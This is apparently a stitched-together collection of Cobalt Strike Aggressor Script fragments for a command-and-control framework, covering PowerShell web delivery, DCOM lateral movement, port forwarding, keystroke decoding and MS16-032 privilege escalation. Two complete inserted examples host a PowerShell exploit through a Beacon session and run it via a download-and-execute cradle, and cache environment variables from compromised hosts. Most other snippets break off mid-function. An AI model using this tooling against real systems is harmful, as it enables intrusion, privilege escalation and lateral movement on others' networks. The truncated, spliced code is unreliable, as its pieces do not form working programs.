# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
    local('%options $script $url $arch');
    %options = $3;    # $3 is the map of values collected by the dialog that calls this

    # get the arch right.
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
    "Synopsis: com-exec [target] [listener]\n\n" .
    "Run a payload on a target via DCOM MMC20.Application Object");

# here's our alias to collect our arguments
alias com-exec {
#
# port forward alias in Beacon and SSH
#

# pull common code into a function
sub _portfwd {
    # $1 is the session ID, $2 the sub-command ("stop"), $3 the forwarded port
    if ($2 eq "stop") {
        btask($1, "Tasked session to stop forward to $3");
        call("beacons.pivot_stop_port", $null, $3);
    }
# convert comma separated keystroke values into a string.
sub toString {
    local('@temp');
    @temp = split(",", $1);
    # drop the leading element; everything after it is a hex-encoded character
    shift(@temp);
    return join("", map({
        return chr(parseNumber($1, 16, 10));    # hex string -> code point -> character
    }, @temp));
}
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
#
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
#    https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack

# logic to run this particular attack
sub exploit {
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;
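Both the ms16-032 integration above and this internal-API script rely on the same pattern: read a .ps1 from disk, host it through the Beacon session, and hand the resulting one-liner to PowerShell in the target. The following is an added example, not one of the gists on this page, that implements that pattern with the official &beacon_host_script API (Cobalt Strike 3.4 and later) so no internal classes are touched. The alias name `ps-host`, the helper `hostAndRun`, and the assumption that the script file sits next to the loaded .cna are choices made for this example.

```sleep
# Added example: host a local PowerShell script via Beacon and run one command from it.
# Assumed names: alias "ps-host", helper &hostAndRun, script stored beside this .cna file.
beacon_command_register("ps-host", "host a local PowerShell script via Beacon and run a command from it",
    "Synopsis: ps-host [file.ps1] [command]\n\n" .
    "Reads file.ps1 from the folder this script was loaded from, serves it through " .
    "Beacon's one-off web server, and runs [command] via powerpick (unmanaged PowerShell).");

sub hostAndRun {
    local('$bid $file $cmd $handle $script $oneliner');
    ($bid, $file, $cmd) = @_;

    # read the script from disk, relative to this .cna file
    $handle = openf(script_resource($file));
    $script = readb($handle, -1);
    closef($handle);

    if ($script is $null || strlen($script) == 0) {
        berror($bid, "could not read $file");
        return;
    }

    # &beacon_host_script serves the script from the Beacon session and returns a
    # short IEX(...) cradle that fetches it; chaining the command after the cradle
    # keeps the whole thing a single line
    $oneliner = beacon_host_script($bid, $script);

    btask($bid, "Tasked Beacon to run $cmd from hosted $file");
    bpowerpick($bid, $oneliner . "; " . $cmd);
}

alias ps-host {
    if ($2 is $null || $3 is $null) {
        berror($1, "usage: ps-host [file.ps1] [command]");
        return;
    }
    hostAndRun($1, $2, $3);
}
```

From a Beacon console, `ps-host MS16-032.ps1 "Invoke-MS16-032"` reproduces steps 1 through 3 of the ms16-032 notes above without a hardcoded script name; the error branch covers the case where the file was not stored beside the script as step 2 requires.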
# demonstrate an example of inversion-of-control with Aggressor Script
#
# co-routine,
sub bot {
    # run pwd and get the output.
    bpwd($bid);
    # register this closure as a one-shot handler; &yield suspends it until
    # beacon_output_alt fires, at which point it resumes with the event's arguments
    when("beacon_output_alt", $this);
    yield;
# getanypid($bid, "process.exe", &callback);
sub getanypid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq $proc) {
                # $1 is our Beacon ID, $pid is the PID of $proc
                [$callback: $1, $proc, $pid];
            }
        }
    # bind the process name and callback into the lambda
    # (assumed argument order: Beacon ID, process name, callback)
    }, $proc => $2, $callback => $3));
}
#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#
global('%bvars');

# request environment variables for every new Beacon that comes in.
on beacon_initial {
    # ideally, we'd have a bshell that could take callbacks. We don't have
    # this yet. Eventually though, we will.
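Without a callback-taking bshell, the output of `set` has to be picked up from the beacon_output event and matched back to the Beacon that produced it. The following is an added example, not the gist's own continuation: it fills %bvars from that event, keyed by Beacon ID and lower-cased variable name, and exposes the cache through a `bvar` alias. The alias name, the &parse_env helper, and the heuristic used to recognise a `set` listing (the presence of both ComSpec and SystemRoot) are choices made for this example.

```sleep
# Added example: cache each Beacon's environment block from "set" output.
# Assumed names: &parse_env helper, "bvar" alias; detection of a "set" listing by
# the ComSpec/SystemRoot pair is an assumption of this example.
global('%bvars');

on beacon_initial {
    # ask each new Beacon for its environment; the result arrives via beacon_output
    %bvars[$1] = %();
    bshell($1, "set");
}

# parse "KEY=VALUE" lines into %bvars[$bid]; returns the number of variables stored
sub parse_env {
    local('$bid $text $line $key $value $count');
    ($bid, $text) = @_;
    $count = 0;

    if (%bvars[$bid] is $null) {
        %bvars[$bid] = %();
    }

    foreach $line (split("\r?\n", $text)) {
        # only lines of the form NAME=VALUE; values may themselves contain "="
        if ("*=*" iswm $line) {
            $key   = substr($line, 0, indexOf($line, "="));
            $value = substr($line, indexOf($line, "=") + 1);
            %bvars[$bid][lc($key)] = $value;
            $count += 1;
        }
    }
    return $count;
}

on beacon_output {
    # a Windows environment block always carries these two variables; use them to
    # tell "set" output apart from other shell output on the same session
    if ("*ComSpec=*" iswm $2 && "*SystemRoot=*" iswm $2) {
        parse_env($1, $2);
    }
}

beacon_command_register("bvar", "show a cached environment variable for this Beacon",
    "Synopsis: bvar [NAME]\n\n" .
    "Prints the value of NAME captured from 'set' when the Beacon first checked in.");

alias bvar {
    local('$value');
    if ($2 is $null) {
        berror($1, "usage: bvar [NAME]");
        return;
    }
    $value = %bvars[$1][lc($2)];
    if ($value is $null) {
        berror($1, "no cached value for $2 (run: shell set)");
    }
    else {
        blog($1, "$2 = $value");
    }
}
```

Variable names are lower-cased on both store and lookup because Windows environment names are case-insensitive; `bvar temp` and `bvar TEMP` therefore resolve to the same entry.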
# getexplorerpid($bid, &callback);
sub getexplorerpid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq "explorer.exe") {
                # $1 is our Beacon ID, $pid is the PID of explorer.exe
                [$callback: $1, $pid];
            }
        }
    # bind the callback argument into the lambda so it is available when bps completes
    }, $callback => $2));
}